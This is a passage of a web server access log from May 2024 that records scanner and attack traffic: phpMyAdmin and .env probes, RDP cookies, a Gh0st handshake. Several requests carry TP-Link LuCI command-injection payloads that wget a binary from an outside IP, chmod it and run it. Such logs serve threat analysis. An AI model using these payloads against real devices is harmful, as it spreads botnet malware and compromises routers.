20:52:43] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:43] "GET http://203.219.129.101:80/php/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:43] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:43] "GET http://203.219.129.101:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:44] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:44] "GET http://203.219.129.101:80/db/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:45] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:45] "GET http://203.219.129.101:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:45] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:45] "GET http://203.219.129.101:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:46] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:46] "GET http://203.219.129.101:80/phpmanager/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:46] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:46] "GET http://203.219.129.101:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:47] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:47] "GET http://203.219.129.101:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:48] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:48] "GET http://203.219.129.101:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 - 185.191.126.213 - - [02/May/2024 21:17:56] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [02/May/2024 21:19:40] code 404, message File not found 83.97.73.245 - - [02/May/2024 21:19:40] "GET /actuator/gateway/routes HTTP/1.1" 404 - 185.224.128.43 - - [02/May/2024 21:45:29] "GET / HTTP/1.1" 200 - 23.26.77.173 - - [02/May/2024 22:28:34] code 404, message File not found 23.26.77.173 - - [02/May/2024 22:28:34] "GET /.env HTTP/1.1" 404 - 185.161.248.148 - - [02/May/2024 22:40:15] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 185.161.248.148 - - [02/May/2024 22:40:15] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 84.54.51.37 - - [02/May/2024 22:48:47] code 404, message File not found 84.54.51.37 - - [02/May/2024 22:48:47] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 - 185.180.143.79 - - [02/May/2024 22:51:50] "GET / HTTP/1.1" 200 - 185.180.143.79 - - [02/May/2024 22:51:51] code 404, message File not found 185.180.143.79 - - [02/May/2024 22:51:51] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 - 185.161.248.148 - - [02/May/2024 22:59:20] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 185.161.248.148 - - [02/May/2024 22:59:20] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 141.255.167.250 - - [02/May/2024 23:01:25] code 404, message File not found 141.255.167.250 - - [02/May/2024 23:01:25] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+%2A%3B+wget+http%3A%2F%2F38.45.200.163%2Farm+%3B+chmod+777+arm%3B+.%2Farm+tplink%3B+rm+-rf+%2A) HTTP/1.1" 404 - 198.199.103.95 - - [02/May/2024 23:22:22] code 404, message File not found 198.199.103.95 - - [02/May/2024 23:22:22] "GET /portal/redlion HTTP/1.1" 404 - 71.6.134.232 - - [03/May/2024 00:16:32] code 400, message Bad request version ('À\\x14À') 71.6.134.232 - - [03/May/2024 00:16:32] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03"\x9f»¸k\x93ç^¥\x1b\x17\x04á\x9f[ä,d\x92s\x80\x16döðÉ]:>ôQ= «äìk\x96,\x86rçZ÷Éõâ\x9by¨¡ÇDWíz}V¿¢glYÚ`\x00&̨̩À/À0À+À,À\x13À\x09À\x14À" 400 - 71.6.134.232 - - [03/May/2024 00:33:09] "GET / HTTP/1.1" 200 - 141.255.167.250 - - [03/May/2024 00:34:07] code 404, message File not found 141.255.167.250 - - [03/May/2024 00:34:07] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Farm+%3B+chmod+777+arm%3B+.%2Farm+tplink%3B+rm+-rf+arm) HTTP/1.1" 404 - 71.6.134.232 - - [03/May/2024 00:35:27] code 404, message File not found 71.6.134.232 - - [03/May/2024 00:35:27] "GET /favicon.ico HTTP/1.1" 404 - 66.240.205.34 - - [03/May/2024 00:45:16] code 400, message Bad request version ('®¯]') 66.240.205.34 - - [03/May/2024 00:45:16] "Gh0st­\x00\x00\x00à\x00\x00\x00x\x9cKS``\x98ÃÀÀÀ\x06Ä\x8c@¼Q\x96\x81\x81\x09H\x07§\x16\x95e&§*\x04$&g+\x182\x94ö°00¬¨rc\x00\x01\x11 \x82\x1f\\`&\x83ÇK7\x86\x19ån\x0c9\x95n\x0c;\x84\x0f3¬èsch¨^Ï4'J\x97©\x82ã0Ã\x91h]&\x90øÎ\x97SËA4L?2=áÄ\x92\x86\x0b@õ`\x0cT\x1f®¯]" 400 - 162.243.130.37 - - [03/May/2024 01:04:48] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [03/May/2024 01:11:46] "GET / HTTP/1.1" 200 - 3.21.162.87 - - [03/May/2024 01:27:17] code 404, message File not found 3.21.162.87 - - [03/May/2024 01:27:17] "GET /robots.txt HTTP/1.1" 404 - 3.21.162.87 - - [03/May/2024 01:27:19] "GET /start.sh HTTP/1.1" 200 - 91.92.246.162 - - [03/May/2024 01:37:45] "GET / HTTP/1.1" 200 - 45.83.65.117 - - [03/May/2024 02:01:33] "GET / HTTP/1.1" 200 - 45.83.66.96 - - [03/May/2024 02:01:35] code 404, message File not found 45.83.66.96 - - [03/May/2024 02:01:35] "GET /favicon.ico HTTP/1.1" 404 - 45.142.182.96 - - [03/May/2024 02:20:46] "GET / HTTP/1.1" 200 - 78.194.200.48 - - [03/May/2024 02:34:47] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [03/May/2024 02:37:20] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [03/May/2024 02:37:20] "CONNECT google.com:443 HTTP/1.1" 501 - 141.255.167.250 - - [03/May/2024 02:54:43] code 404, message File not found 141.255.167.250 - - [03/May/2024 02:54:43] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Farm+%3B+chmod+777+arm%3B+.%2Farm+tplink%3B+rm+-rf+arm) HTTP/1.1" 404 - 104.199.68.30 - - [03/May/2024 02:59:48] "GET / HTTP/1.1" 200 - 52.15.63.145 - - [03/May/2024 03:05:09] code 404, message File not found 52.15.63.145 - - [03/May/2024 03:05:09] "GET /robots.txt HTTP/1.1" 404 -